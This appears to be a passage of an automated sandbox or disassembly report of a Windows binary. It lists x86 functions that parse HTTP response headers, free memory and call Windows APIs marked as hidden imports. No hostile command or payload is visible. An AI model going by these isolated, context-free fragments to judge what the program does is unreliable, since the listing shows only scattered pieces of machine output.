0041D8B3 call dword ptr [ebx+50h]
0041D8B6 cmp dword ptr [ebp-3Ch], 00000000h
0041D8BA je 0041D8CBh
0041D8BC mov eax, dword ptr [ebp-04h]
0041D8BF mov eax, dword ptr [eax+1Ch]
0041D8C2 cmp dword ptr [eax+000001B8h], 00000000h
0041D8C9 je 0041D8A2h
0041D8CB mov eax, dword ptr [ebp-04h] xrefs 0041D8BA
0041D8CE mov eax, dword ptr [eax+58h]
0041D8D1 cmp eax, 64h
0041D8D4 jl 0041DA0Bh
0041D8DA cmp eax, 000000C8h
0041D8DF jnl 0041DA0Bh
0041D8E5 lea eax, dword ptr [ebp-10h]
0041D8E8 call 004043DCh
0041D8ED mov eax, dword ptr [ebp-04h]
0041D8F0 mov eax, dword ptr [eax+30h]
0041D8F3 mov edx, dword ptr [eax]
0041D8F5 call dword ptr [edx]
0041D8F7 mov edx, dword ptr [ebp-04h]
0041D8FA mov dword ptr [edx+6Ch], eax
0041D8FD mov eax, dword ptr [ebp-04h]
0041D900 mov ebx, dword ptr [eax+30h]
0041D903 mov eax, ebx
0041D905 mov edx, dword ptr [eax]
0041D907 call dword ptr [edx]
0041D909 mov ecx, eax
0041D90B mov edx, dword ptr [ebx+04h]
0041D90E mov eax, dword ptr [ebp-04h]
0041D911 mov eax, dword ptr [eax+1Ch]
0041D914 mov ebx, dword ptr [eax]
0041D916 call dword ptr [ebx+1Ch]
0041D919 jmp 0041DA0Bh
0041D91E cmp byte ptr [ebp-0Ah], 00000000h xrefs 0041D82B
0041D922 je 0041D9ECh
0041D928 mov eax, dword ptr [ebp-04h]
0041D92B mov eax, dword ptr [eax+30h]
0041D92E mov edx, dword ptr [eax]
0041D930 call dword ptr [edx]
0041D932 cmp edx, 00000000h
0041D935 jne 0041D940h
0041D937 cmp eax, 00010000h
0041D93C jc 0041D98Fh
0041D93E jmp 0041D942h
0041D940 jl 0041D98Fh xrefs 0041D935
0041D942 lea edx, dword ptr [ebp-000000D0h] xrefs 0041D93E
0041D948 mov eax, dword ptr [ebp-04h]
0041D94B call 0041CF78h
0041D950 mov edx, dword ptr [ebp-000000D0h]
0041D956 mov eax, dword ptr [ebp-04h]
0041D959 mov eax, dword ptr [eax+1Ch]
0041D95C mov ecx, dword ptr [eax]
0041D95E call dword ptr [ecx+24h]
0041D961 mov eax, dword ptr [ebp-04h]
0041D964 mov eax, dword ptr [eax+30h]
0041D967 mov edx, dword ptr [eax]
0041D969 call dword ptr [edx]
0041D96B mov edx, dword ptr [ebp-04h]
0041D96E mov dword ptr [edx+6Ch], eax
0041D971 mov eax, dword ptr [ebp-04h]
0041D974 mov ebx, dword ptr [eax+30h]
0041D977 mov eax, ebx
0041D979 mov edx, dword ptr [eax]
0041D97B call dword ptr [edx]
0041D97D mov ecx, eax
0041D97F mov edx, dword ptr [ebx+04h]
0041D982 mov eax, dword ptr [ebp-04h]
0041D985 mov eax, dword ptr [eax+1Ch]
0041D988 mov ebx, dword ptr [eax]
0041D98A call dword ptr [ebx+1Ch]
0041D98D jmp 0041DA0Bh
0041D98F mov eax, dword ptr [ebp-04h] xrefs 0041D940, 0041D93C
0041D992 mov ebx, dword ptr [eax+30h]
0041D995 mov eax, ebx
0041D997 mov edx, dword ptr [eax]
0041D999 call dword ptr [edx]
0041D99B mov edx, eax
0041D99D lea ecx, dword ptr [ebp-000000D4h]
0041D9A3 mov eax, ebx
0041D9A5 call 00415A60h
0041D9AA mov eax, dword ptr [ebp-000000D4h]
0041D9B0 push eax
0041D9B1 lea edx, dword ptr [ebp-000000D8h]
0041D9B7 mov eax, dword ptr [ebp-04h]
0041D9BA call 0041CF78h
0041D9BF mov edx, dword ptr [ebp-000000D8h]
0041D9C5 lea eax, dword ptr [ebp-3Ch]
0041D9C8 pop ecx
0041D9C9 call 004046C4h
0041D9CE mov eax, dword ptr [ebp-3Ch]
0041D9D1 call 00404678h
0041D9D6 mov edx, dword ptr [ebp-04h]
0041D9D9 mov dword ptr [edx+6Ch], eax
0041D9DC mov eax, dword ptr [ebp-04h]
0041D9DF mov eax, dword ptr [eax+1Ch]
0041D9E2 mov edx, dword ptr [ebp-3Ch]
0041D9E5 mov ecx, dword ptr [eax]
0041D9E7 call dword ptr [ecx+24h]
0041D9EA jmp 0041DA0Bh
0041D9EC lea edx, dword ptr [ebp-000000DCh] xrefs 0041D922
0041D9F2 mov eax, dword ptr [ebp-04h]
0041D9F5 call 0041CF78h
0041D9FA mov edx, dword ptr [ebp-000000DCh]
0041DA00 mov eax, dword ptr [ebp-04h]
0041DA03 mov eax, dword ptr [eax+1Ch]
0041DA06 mov ecx, dword ptr [eax]
0041DA08 call dword ptr [ecx+24h]
0041DA0B mov eax, dword ptr [ebp-04h] xrefs 0041D9EA, 0041D98D, 0041D8D4, 0041D8DF, 0041D919
0041DA0E mov eax, dword ptr [eax+1Ch]
0041DA11 cmp dword ptr [eax+000001B8h], 00000000h
0041DA18 jne 0041DE04h
0041DA1E mov eax, dword ptr [ebp-04h]
0041DA21 call 0041CE68h
0041DA26 mov dword ptr [ebp-18h], FFFFFFFFh
0041DA2D mov eax, dword ptr [ebp-04h]
0041DA30 mov byte ptr [eax+20h], 00000000h
0041DA34 cmp byte ptr [ebp+08h], 00000001h
0041DA38 jne 0041DDE3h
0041DA3E cmp dword ptr [ebp-10h], 00000000h
0041DA42 jne 0041DAEEh
0041DA48 lea ecx, dword ptr [ebp-3Ch] xrefs 0041DAE6, 0041DA6F
0041DA4B mov eax, dword ptr [ebp-04h]
0041DA4E mov edx, dword ptr [eax+10h]
0041DA51 mov eax, dword ptr [ebp-04h]
0041DA54 mov eax, dword ptr [eax+1Ch]
0041DA57 mov ebx, dword ptr [eax]
0041DA59 call dword ptr [ebx+50h]
0041DA5C cmp dword ptr [ebp-3Ch], 00000000h
0041DA60 jne 0041DA71h
0041DA62 mov eax, dword ptr [ebp-04h]
0041DA65 mov eax, dword ptr [eax+1Ch]
0041DA68 cmp dword ptr [eax+000001B8h], 00000000h
0041DA6F je 0041DA48h
0041DA71 lea edx, dword ptr [ebp-000000E0h] xrefs 0041DA60
0041DA77 mov eax, dword ptr [ebp-3Ch]
0041DA7A call 00407284h
0041DA7F mov edx, dword ptr [ebp-000000E0h]
0041DA85 mov eax, 0041E054h ASCII "HTTP/"
0041DA8A call 00404960h
0041DA8F dec eax
0041DA90 jne 0041DAADh
0041DA92 mov eax, dword ptr [ebp-04h]
0041DA95 mov eax, dword ptr [eax+2Ch]
0041DA98 mov edx, dword ptr [ebp-3Ch]
0041DA9B mov ecx, dword ptr [eax]
0041DA9D call dword ptr [ecx+38h]
0041DAA0 mov edx, dword ptr [ebp-3Ch]
0041DAA3 mov eax, dword ptr [ebp-04h]
0041DAA6 call 0041CEA8h
0041DAAB jmp 0041DAD0h
0041DAAD lea eax, dword ptr [ebp-3Ch] xrefs 0041DA90
0041DAB0 mov edx, 0041E064h
0041DAB5 call 00404680h
0041DABA mov eax, dword ptr [ebp-04h]
0041DABD mov eax, dword ptr [eax+30h]
0041DAC0 mov edx, dword ptr [ebp-3Ch]
0041DAC3 call 00415A90h
0041DAC8 mov eax, dword ptr [ebp-04h]
0041DACB xor edx, edx
0041DACD mov dword ptr [eax+58h], edx
0041DAD0 mov eax, dword ptr [ebp-04h] xrefs 0041DAAB
0041DAD3 mov eax, dword ptr [eax+1Ch]
0041DAD6 cmp dword ptr [eax+000001B8h], 00000000h
0041DADD jne 0041DAFCh
0041DADF mov eax, dword ptr [ebp-04h]
0041DAE2 cmp dword ptr [eax+58h], 64h
0041DAE6 je 0041DA48h
0041DAEC jmp 0041DAFCh
0041DAEE mov eax, dword ptr [ebp-04h] xrefs 0041DA42
0041DAF1 mov eax, dword ptr [eax+2Ch]
0041DAF4 mov edx, dword ptr [ebp-10h]
0041DAF7 mov ecx, dword ptr [eax]
0041DAF9 call dword ptr [ecx+38h]
0041DAFC mov eax, dword ptr [ebp-04h] xrefs 0041DADD, 0041DAEC
0041DAFF mov eax, dword ptr [eax+38h]
0041DB02 mov edx, 0041DE64h ASCII "1.1"
0041DB07 call 004047C4h
0041DB0C setne byte ptr [ebp-11h]
0041DB10 mov eax, dword ptr [ebp-04h]
0041DB13 mov eax, dword ptr [eax+2Ch]
0041DB16 mov edx, dword ptr [eax]
0041DB18 call dword ptr [edx+14h]
0041DB1B test eax, eax
0041DB1D jng 0041DD0Eh
0041DB23 mov dl, 01h
0041DB25 mov eax, dword ptr [0040FD08h] 0040FD54
0041DB2A call 004036D8h
0041DB2F mov dword ptr [ebp-4Ch], eax
0041DB32 xor eax, eax
0041DB34 push ebp
0041DB35 push 0041DD07h
0041DB3A push dword ptr fs:[eax]
0041DB3D mov dword ptr fs:[eax], esp
0041DB40 lea ecx, dword ptr [ebp-3Ch] xrefs 0041DB72
0041DB43 mov eax, dword ptr [ebp-04h]
0041DB46 mov edx, dword ptr [eax+10h]
0041DB49 mov eax, dword ptr [ebp-04h]
0041DB4C mov eax, dword ptr [eax+1Ch]
0041DB4F mov ebx, dword ptr [eax]
0041DB51 call dword ptr [ebx+50h]
0041DB54 mov edx, dword ptr [ebp-3Ch]
0041DB57 mov eax, dword ptr [ebp-4Ch]
0041DB5A mov ecx, dword ptr [eax]
0041DB5C call dword ptr [ecx+38h]
0041DB5F cmp dword ptr [ebp-3Ch], 00000000h
0041DB63 je 0041DB74h
0041DB65 mov eax, dword ptr [ebp-04h]
0041DB68 mov eax, dword ptr [eax+1Ch]
0041DB6B cmp dword ptr [eax+000001B8h], 00000000h
0041DB72 je 0041DB40h
0041DB74 xor eax, eax xrefs 0041DB63
0041DB76 mov dword ptr [ebp-50h], eax
0041DB79 jmp 0041DCE0h
0041DB7E lea ecx, dword ptr [ebp-3Ch] xrefs 0041DCEB
0041DB81 lea edx, dword ptr [ebp-50h]
0041DB84 mov eax, dword ptr [ebp-4Ch]
0041DB87 call 00415AECh
0041DB8C mov eax, dword ptr [ebp-04h]
0041DB8F mov eax, dword ptr [eax+2Ch]
0041DB92 mov edx, dword ptr [ebp-3Ch]
0041DB95 mov ecx, dword ptr [eax]
0041DB97 call dword ptr [ecx+38h]
0041DB9A lea edx, dword ptr [ebp-40h]
0041DB9D mov eax, dword ptr [ebp-3Ch]
0041DBA0 call 00407284h
0041DBA5 mov edx, dword ptr [ebp-40h]
0041DBA8 mov eax, 0041E070h ASCII "CONTENT-LENGTH:"
0041DBAD call 00404960h
0041DBB2 dec eax
0041DBB3 jne 0041DC00h
0041DBB5 lea ecx, dword ptr [ebp-000000E8h]
0041DBBB mov edx, 0041E038h
0041DBC0 mov eax, dword ptr [ebp-3Ch]
0041DBC3 call 00415250h
0041DBC8 mov eax, dword ptr [ebp-000000E8h]
0041DBCE lea edx, dword ptr [ebp-000000E4h]
0041DBD4 call 004073FCh
0041DBD9 mov eax, dword ptr [ebp-000000E4h]
0041DBDF or edx, FFFFFFFFh
0041DBE2 call 00407608h
0041DBE7 mov dword ptr [ebp-18h], eax
0041DBEA cmp dword ptr [ebp-18h], FFFFFFFFh
0041DBEE je 0041DC00h
0041DBF0 mov eax, dword ptr [ebp-04h]
0041DBF3 cmp byte ptr [eax+20h], 00000000h
0041DBF7 jne 0041DC00h
0041DBF9 mov eax, dword ptr [ebp-04h]
0041DBFC mov byte ptr [eax+20h], 00000001h
0041DC00 mov edx, dword ptr [ebp-40h] xrefs 0041DBB3, 0041DBEE, 0041DBF7
0041DC03 mov eax, 0041E088h ASCII "CONTENT-TYPE:"
0041DC08 call 00404960h
0041DC0D dec eax
0041DC0E jne 0041DC45h
0041DC10 lea ecx, dword ptr [ebp-000000F0h]
0041DC16 mov edx, 0041E038h
0041DC1B mov eax, dword ptr [ebp-3Ch]
0041DC1E call 00415250h
0041DC23 mov eax, dword ptr [ebp-000000F0h]
0041DC29 lea edx, dword ptr [ebp-000000ECh]
0041DC2F call 004073FCh
0041DC34 mov edx, dword ptr [ebp-000000ECh]
0041DC3A mov eax, dword ptr [ebp-04h]
0041DC3D add eax, 34h
0041DC40 call 00404430h
0041DC45 mov edx, dword ptr [ebp-40h] xrefs 0041DC0E
0041DC48 mov eax, 0041E0A0h ASCII "TRANSFER-ENCODING:"
0041DC4D call 00404960h
0041DC52 dec eax
0041DC53 jne 0041DC8Eh
0041DC55 lea ecx, dword ptr [ebp-000000F4h]
0041DC5B mov edx, 0041E038h
0041DC60 mov eax, dword ptr [ebp-40h]
0041DC63 call 00415250h
0041DC68 mov eax, dword ptr [ebp-000000F4h]
0041DC6E lea edx, dword ptr [ebp-3Ch]
0041DC71 call 004073FCh
0041DC76 mov edx, dword ptr [ebp-3Ch]
0041DC79 mov eax, 0041E0BCh ASCII "CHUNKED"
0041DC7E call 00404960h
0041DC83 test eax, eax
0041DC85 jle 0041DC8Eh
0041DC87 mov eax, dword ptr [ebp-04h]
0041DC8A mov byte ptr [eax+20h], 00000002h
0041DC8E cmp byte ptr [ebp-45h], 00000000h xrefs 0041DC53, 0041DC85
0041DC92 je 0041DCBBh
0041DC94 mov edx, dword ptr [ebp-40h]
0041DC97 mov eax, 0041E0CCh ASCII "PROXY-CONNECTION:"
0041DC9C call 00404960h
0041DCA1 dec eax
0041DCA2 jne 0041DCE0h
0041DCA4 mov edx, dword ptr [ebp-40h]
0041DCA7 mov eax, 0041E0E8h ASCII "CLOSE"
0041DCAC call 00404960h
0041DCB1 test eax, eax
0041DCB3 jle 0041DCE0h
0041DCB5 mov byte ptr [ebp-11h], 00000001h
0041DCB9 jmp 0041DCE0h
0041DCBB mov edx, dword ptr [ebp-40h] xrefs 0041DC92
0041DCBE mov eax, 0041E0F8h ASCII "CONNECTION:"
0041DCC3 call 00404960h
0041DCC8 dec eax
0041DCC9 jne 0041DCE0h
0041DCCB mov edx, dword ptr [ebp-40h]
0041DCCE mov eax, 0041E0E8h ASCII "CLOSE"
0041DCD3 call 00404960h
0041DCD8 test eax, eax
0041DCDA jle 0041DCE0h
0041DCDC mov byte ptr [ebp-11h], 00000001h
0041DCE0 mov eax, dword ptr [ebp-4Ch] xrefs 0041DB79, 0041DCC9, 0041DCDA, 0041DCA2, 0041DCB3, 0041DCB9
0041DCE3 mov edx, dword ptr [eax]
0041DCE5 call dword ptr [edx+14h]
0041DCE8 cmp eax, dword ptr [ebp-50h]
0041DCEB jg 0041DB7Eh
0041DCF1 xor eax, eax
0041DCF3 pop edx
0041DCF5 pop ecx Count = 2
0041DCF6 mov dword ptr fs:[eax], edx
0041DCF9 push 0041DD0Eh
0041DCFE mov eax, dword ptr [ebp-4Ch] xrefs 0041DD0C
0041DD01 call 00403708h
0041DD06 ret function end
0041DD0E mov eax, dword ptr [ebp-04h] xrefs 0041DB1D
0041DD11 mov eax, dword ptr [eax+1Ch]
0041DD14 cmp dword ptr [eax+000001B8h], 00000000h
0041DD1B sete byte ptr [ebp-09h]
0041DD1F cmp byte ptr [ebp-09h], 00000000h
0041DD23 je 0041DE04h
0041DD29 mov eax, dword ptr [ebp-08h]
0041DD2C mov edx, 0041E10Ch
0041DD31 call 004047C4h
0041DD36 setne al
0041DD39 test al, al
0041DD3B je 0041DD49h
0041DD3D mov eax, dword ptr [ebp-04h]
0041DD40 cmp dword ptr [eax+58h], 000000CCh
0041DD47 jne 0041DD4Dh
0041DD49 xor eax, eax xrefs 0041DD3B
0041DD4B jmp 0041DD4Fh
0041DD4D mov al, 01h xrefs 0041DD47
0041DD4F test al, al xrefs 0041DD4B
0041DD51 je 0041DD5Fh
0041DD53 mov eax, dword ptr [ebp-04h]
0041DD56 cmp dword ptr [eax+58h], 00000130h
0041DD5D jne 0041DD63h
0041DD5F xor eax, eax xrefs 0041DD51
0041DD61 jmp 0041DD65h
0041DD63 mov al, 01h xrefs 0041DD5D
0041DD65 test al, al xrefs 0041DD61
0041DD67 je 0041DDA3h
0041DD69 mov eax, dword ptr [ebp-04h]
0041DD6C mov al, byte ptr [eax+20h]
0041DD6F sub al, 01h
0041DD71 jc 0041DD7Bh
0041DD73 je 0041DD88h
0041DD75 dec al
0041DD77 je 0041DD98h
0041DD79 jmp 0041DDA3h
0041DD7B mov eax, dword ptr [ebp-04h] xrefs 0041DD71
0041DD7E call 0041E114h
0041DD83 mov byte ptr [ebp-09h], al
0041DD86 jmp 0041DDA3h
0041DD88 mov edx, dword ptr [ebp-18h] xrefs 0041DD73
0041DD8B mov eax, dword ptr [ebp-04h]
0041DD8E call 0041E1A0h
0041DD93 mov byte ptr [ebp-09h], al
0041DD96 jmp 0041DDA3h
0041DD98 mov eax, dword ptr [ebp-04h] xrefs 0041DD77
0041DD9B call 0041E1E4h
0041DDA0 mov byte ptr [ebp-09h], al
0041DDA3 mov eax, dword ptr [ebp-04h] xrefs 0041DD67, 0041DD86, 0041DD96, 0041DD79
0041DDA6 mov eax, dword ptr [eax+30h]
0041DDA9 xor ecx, ecx
0041DDAB xor edx, edx
0041DDAD mov ebx, dword ptr [eax]
0041DDAF call dword ptr [ebx+14h]
0041DDB2 cmp byte ptr [ebp-11h], 00000000h
0041DDB6 je 0041DDD9h
0041DDB8 mov eax, dword ptr [ebp-04h]
0041DDBB mov eax, dword ptr [eax+1Ch]
0041DDBE mov edx, dword ptr [eax]
0041DDC0 call dword ptr [edx+10h]
0041DDC3 mov eax, dword ptr [ebp-04h]
0041DDC6 add eax, 24h
0041DDC9 call 004043DCh
0041DDCE mov eax, dword ptr [ebp-04h]
0041DDD1 add eax, 28h
0041DDD4 call 004043DCh
0041DDD9 mov eax, dword ptr [ebp-04h] xrefs 0041DDB6
0041DDDC call 0041E308h
0041DDE1 jmp 0041DE04h
0041DDE3 mov eax, dword ptr [ebp-04h] xrefs 0041DA38
0041DDE6 mov eax, dword ptr [eax+1Ch]
0041DDE9 mov edx, dword ptr [eax]
0041DDEB call dword ptr [edx+10h]
0041DDEE mov eax, dword ptr [ebp-04h]
0041DDF1 add eax, 24h
0041DDF4 call 004043DCh
0041DDF9 mov eax, dword ptr [ebp-04h]
0041DDFC add eax, 28h
0041DDFF call 004043DCh
0041DE04 xor eax, eax xrefs 0041DA18, 0041DD23, 0041DDE1, 0041D85D, 0041D80B
0041DE06 pop edx
0041DE08 pop ecx Count = 2
0041DE09 mov dword ptr fs:[eax], edx
0041DE0C push 0041DE3Eh
0041DE11 lea eax, dword ptr [ebp-000000F4h] xrefs 0041DE3C
0041DE17 mov edx, 00000029h
0041DE1C call 00404400h
0041DE21 lea eax, dword ptr [ebp-44h]
0041DE24 mov edx, 0000000Bh
0041DE29 call 00404400h
0041DE2E lea eax, dword ptr [ebp-10h]
0041DE31 call 004043DCh
0041DE36 ret function end
APIs
  • LocalFree.KERNEL32, ref: 00401B0B
  • VirtualFree.KERNEL32, ref: 00401B2A
  • RtlDeleteCriticalSection.NTDLL, ref: 00401B9C
Address Instruction Meta Information
00401ACC push ebp xrefs 00405E83
00401ACD mov ebp, esp
00401ACF push ebx
00401AD0 cmp byte ptr [0042C5BCh], 00000000h
00401AD7 je 00401BA9h
00401ADD xor edx, edx
00401ADF push ebp
00401AE0 push 00401BA2h
00401AE5 push dword ptr fs:[edx]
00401AE8 mov dword ptr fs:[edx], esp
00401AEB cmp byte ptr [0042C045h], 00000000h
00401AF2 je 00401AFEh
00401AF4 push 0042C5C4h
00401AF9 call 00401364h
00401AFE mov byte ptr [0042C5BCh], 00000000h xrefs 00401AF2
00401B05 mov eax, dword ptr [0042C61Ch] 00147BC8
00401B0A push eax
00401B0B call 00401344h LocalFree@KERNEL32.DLL (Hidden Import)
00401B10 xor eax, eax
00401B12 mov dword ptr [0042C61Ch], eax
00401B17 mov ebx, dword ptr [0042C5E4h] 001491FC
00401B1D jmp 00401B31h
00401B1F push 00008000h xrefs 00401B37
00401B24 push 00000000h
00401B26 mov eax, dword ptr [ebx+08h]
00401B29 push eax
00401B2A call 00401354h VirtualFree@KERNEL32.DLL (Import)
00401B2F mov ebx, dword ptr [ebx]
00401B31 cmp ebx, 0042C5E4h xrefs 00401B1D
00401B37 jne 00401B1Fh
00401B39 mov eax, 0042C5E4h
00401B3E call 004013CCh
00401B43 mov eax, 0042C5F4h
00401B48 call 004013CCh
00401B4D mov eax, 0042C620h
00401B52 call 004013CCh
00401B57 mov eax, dword ptr [0042C5DCh] 00148BC8
00401B5C test eax, eax
00401B5E je 00401B77h
00401B60 mov edx, dword ptr [eax] xrefs 00401B75
00401B62 mov dword ptr [0042C5DCh], edx
00401B68 push eax
00401B69 call 00401344h
00401B6E mov eax, dword ptr [0042C5DCh] 00148BC8
00401B73 test eax, eax
00401B75 jne 00401B60h
00401B77 xor eax, eax xrefs 00401B5E
00401B79 pop edx
00401B7B pop ecx Count = 2
00401B7C mov dword ptr fs:[eax], edx
00401B7F push 00401BA9h
00401B84 cmp byte ptr [0042C045h], 00000000h xrefs 00401BA7
00401B8B je 00401B97h
00401B8D push 0042C5C4h
00401B92 call 0040136Ch
00401B97 push 0042C5C4h xrefs 00401B8B
00401B9C call 00401374h RtlDeleteCriticalSection@NTDLL.DLL (Hidden Import)
00401BA1 ret function end
00401BA9 pop ebx xrefs 00401AD7
00401BAA pop ebp
00401BAB ret function end
APIs
  • GetACP.KERNEL32, ref: 0040B59F
Address Instruction Meta Information
0040B560 push ebp xrefs 0040B5E7
0040B561 mov ebp, esp
0040B563 add esp, FFFFFFF4h
0040B566 push ebx
0040B567 xor edx, edx
0040B569 mov dword ptr [ebp-0Ch], edx
0040B56C xor edx, edx
0040B56E push ebp
0040B56F push 0040B5C4h
0040B574 push dword ptr fs:[edx]
0040B577 mov dword ptr fs:[edx], esp
0040B57A push 00000007h
0040B57C lea edx, dword ptr [ebp-07h]
0040B57F push edx
0040B580 push 00001004h
0040B585 push eax
0040B586 call 004061BCh
0040B58B lea eax, dword ptr [ebp-0Ch]
0040B58E lea edx, dword ptr [ebp-07h]
0040B591 mov ecx, 00000007h
0040B596 call 0040464Ch
0040B59B mov eax, dword ptr [ebp-0Ch]
0040B59E push eax
0040B59F call 00406174h GetACP@KERNEL32.DLL (Hidden Import)
0040B5A4 mov edx, eax
0040B5A6 pop eax
0040B5A7 call 00407608h
0040B5AC mov ebx, eax
0040B5AE xor eax, eax
0040B5B0 pop edx
0040B5B2 pop ecx Count = 2
0040B5B3 mov dword ptr fs:[eax], edx
0040B5B6 push 0040B5CBh
0040B5BB lea eax, dword ptr [ebp-0Ch] xrefs 0040B5C9
0040B5BE call 004043DCh
0040B5C3 ret function end
Address Instruction Meta Information
0041C1D4 push ebp
0041C1D5 mov ebp, esp
0041C1D7 add esp, FFFFFFF4h
0041C1DA push ebx
0041C1DB push esi
0041C1DC push edi
0041C1DD xor ebx, ebx
0041C1DF mov dword ptr [ebp-0Ch], ebx
0041C1E2 mov dword ptr [ebp-04h], ecx
0041C1E5 mov esi, edx
0041C1E7 mov ebx, eax
0041C1E9 xor eax, eax
0041C1EB push ebp
0041C1EC push 0041C2CBh
0041C1F1 push dword ptr fs:[eax]
0041C1F4 mov dword ptr fs:[eax], esp
0041C1F7 mov eax, dword ptr [ebx+00000200h]
0041C1FD cmp byte ptr [eax+08h], 00000000h
0041C201 je 0041C2A6h
0041C207 xor eax, eax
0041C209 mov dword ptr [ebp-08h], eax
0041C20C mov eax, ebx
0041C20E call 004186ECh
0041C213 test al, al
0041C215 jne 0041C2B5h
0041C21B mov eax, ebx
0041C21D call 0041949Ch
0041C222 lea eax, dword ptr [ebx+00000084h]
0041C228 push eax
0041C229 mov ecx, dword ptr [ebx+00000080h]
0041C22F mov edx, dword ptr [ebp-04h]
0041C232 mov eax, ebx
0041C234 call 004185FCh
0041C239 mov ecx, dword ptr [ebp-04h]
0041C23C mov edx, esi
0041C23E mov eax, dword ptr [ebx+00000200h]
0041C244 mov edi, dword ptr [eax]
0041C246 call dword ptr [edi+28h]
0041C249 mov dword ptr [ebp-08h], eax
0041C24C mov eax, dword ptr [ebx+00000200h]
0041C252 cmp dword ptr [eax+0Ch], 00000000h
0041C256 je 0041C262h
0041C258 mov dword ptr [ebx+000001B8h], 0000276Bh
0041C262 mov eax, ebx xrefs 0041C256
0041C264 call 0041952Ch
0041C269 mov eax, dword ptr [ebp-08h]
0041C26C add dword ptr [ebx+0000019Ch], eax
0041C272 lea edx, dword ptr [ebp-0Ch]
0041C275 mov eax, dword ptr [ebp-08h]
0041C278 call 004074CCh
0041C27D mov ecx, dword ptr [ebp-0Ch]
0041C280 mov dl, 0Ah
0041C282 mov eax, ebx
0041C284 call 00419E70h
0041C289 mov eax, dword ptr [ebp-08h]
0041C28C push eax
0041C28D mov ecx, esi
0041C28F xor edx, edx
0041C291 mov eax, ebx
0041C293 call 00419F3Ch
0041C298 lea ecx, dword ptr [ebp-08h]
0041C29B mov edx, esi
0041C29D mov eax, ebx
0041C29F call 00419E88h
0041C2A4 jmp 0041C2B5h
0041C2A6 mov ecx, dword ptr [ebp-04h] xrefs 0041C201
0041C2A9 mov edx, esi
0041C2AB mov eax, ebx
0041C2AD call 00418AA4h
0041C2B2 mov dword ptr [ebp-08h], eax
0041C2B5 xor eax, eax xrefs 0041C215, 0041C2A4
0041C2B7 pop edx
0041C2B9 pop ecx Count = 2
0041C2BA mov dword ptr fs:[eax], edx
0041C2BD push 0041C2D2h
0041C2C2 lea eax, dword ptr [ebp-0Ch] xrefs 0041C2D0
0041C2C5 call 004043DCh
0041C2CA ret function end
APIs
  • ResetEvent.KERNEL32, ref: 00412EF6
Address Instruction Meta Information
00412EF0 mov eax, dword ptr [0042C848h] 00000048 xrefs 00412F8C, 00412F0F
00412EF5 push eax
00412EF6 call 00406264h ResetEvent@KERNEL32.DLL (Hidden Import)
00412EFB ret function end
APIs
  • InitializeCriticalSection.KERNEL32, ref: 0040F586
Address Instruction Meta Information
0040F4F8 push ebp
0040F4F9 mov ebp, esp
0040F4FB xor eax, eax
0040F4FD push ebp
0040F4FE push 0040F599h
0040F503 push dword ptr fs:[eax]
0040F506 mov dword ptr fs:[eax], esp
0040F509 sub dword ptr [0042C818h], 01h
0040F510 jnc 0040F58Bh
0040F512 mov eax, 0042C7F8h
0040F517 call 0040F0F4h
0040F51C mov eax, 0040D834h
0040F521 mov dword ptr [0042C808h], eax
0040F526 mov eax, 0040D45Ch
0040F52B mov dword ptr [0042C80Ch], eax
0040F530 mov edx, 0040D36Ch
0040F535 mov dword ptr [0042C810h], edx
0040F53B mov dword ptr [0042C814h], eax
0040F540 mov eax, 0040DB20h
0040F545 mov edx, dword ptr [0042B870h] 0042B010
0040F54B mov dword ptr [edx], eax
0040F54D mov eax, 0040EDE8h
0040F552 mov edx, dword ptr [0042B790h] 0042B014
0040F558 mov dword ptr [edx], eax
0040F55A mov eax, 0040DE34h
0040F55F mov edx, dword ptr [0042B8BCh] 0042B018
0040F565 mov dword ptr [edx], eax
0040F567 mov eax, 0040E160h
0040F56C mov edx, dword ptr [0042B964h] 0042B01C
0040F572 mov dword ptr [edx], eax
0040F574 mov eax, 0040E888h
0040F579 mov edx, dword ptr [0042B8C8h] 0042B020
0040F57F mov dword ptr [edx], eax
0040F581 push 0042C820h
0040F586 call 00406234h InitializeCriticalSection@KERNEL32.DLL (Hidden Import)
0040F58B xor eax, eax xrefs 0040F510
0040F58D pop edx
0040F58F pop ecx Count = 2
0040F590 mov dword ptr fs:[eax], edx
0040F593 push 0040F5A0h
0040F598 ret xrefs 0040F59E function end
Address Instruction Meta Information
004052E0 push ebx xrefs 00405343
004052E1 push esi
004052E2 add esp, FFFFFEF8h
004052E8 mov ebx, eax
004052EA cmp dword ptr [ebx+10h], 00000000h
004052EE jne 0040531Bh
004052F0 push 00000105h
004052F5 lea eax, dword ptr [esp+04h]
004052F9 push eax
004052FA mov eax, dword ptr [ebx+04h]
004052FD push eax
004052FE call 00401258h
00405303 mov eax, esp
00405305 mov dl, 01h
00405307 call 0040551Ch
0040530C mov esi, eax
0040530E mov dword ptr [ebx+10h], esi
00405311 test esi, esi
00405313 jne 0040531Bh
00405315 mov eax, dword ptr [ebx+04h]
00405318 mov dword ptr [ebx+10h], eax
0040531B mov eax, dword ptr [ebx+10h] xrefs 004052EE, 00405313
0040531E add esp, 00000108h
00405324 pop esi
00405325 pop ebx
00405326 ret function end
APIs
  • SetEndOfFile.KERNEL32, ref: 00412231
Address Instruction Meta Information
00412218 push ebp
00412219 mov ebp, esp
0041221B push ebx
0041221C mov ebx, eax
0041221E push dword ptr [ebp+0Ch]
00412221 push dword ptr [ebp+08h]
00412224 xor edx, edx
00412226 mov eax, ebx
00412228 mov ecx, dword ptr [eax]
0041222A call dword ptr [ecx+18h]
0041222D mov eax, dword ptr [ebx+04h]
00412230 push eax
00412231 call 00406274h SetEndOfFile@KERNEL32.DLL (Hidden Import)
00412236 call 0040BBDCh
0041223B pop ebx
0041223C pop ebp
0041223D retn 0008h function end
Address Instruction Meta Information
0041C2DC push ebp
0041C2DD mov ebp, esp
0041C2DF add esp, FFFFFFECh
0041C2E2 push ebx
0041C2E3 push esi
0041C2E4 xor ebx, ebx
0041C2E6 mov dword ptr [ebp-14h], ebx
0041C2E9 mov esi, ecx
0041C2EB mov dword ptr [ebp-04h], edx
0041C2EE mov ebx, eax
0041C2F0 xor eax, eax
0041C2F2 push ebp
0041C2F3 push 0041C407h
0041C2F8 push dword ptr fs:[eax]
0041C2FB mov dword ptr fs:[eax], esp
0041C2FE mov eax, dword ptr [ebx+00000200h]
0041C304 cmp byte ptr [eax+08h], 00000000h
0041C308 je 0041C3E2h
0041C30E xor eax, eax
0041C310 mov dword ptr [ebp-08h], eax
0041C313 mov eax, ebx
0041C315 call 004186ECh
0041C31A test al, al
0041C31C jne 0041C3F1h
0041C322 mov eax, ebx
0041C324 call 0041949Ch
0041C329 push esi
0041C32A mov ecx, dword ptr [ebp-04h]
0041C32D mov dl, 01h
0041C32F mov eax, ebx
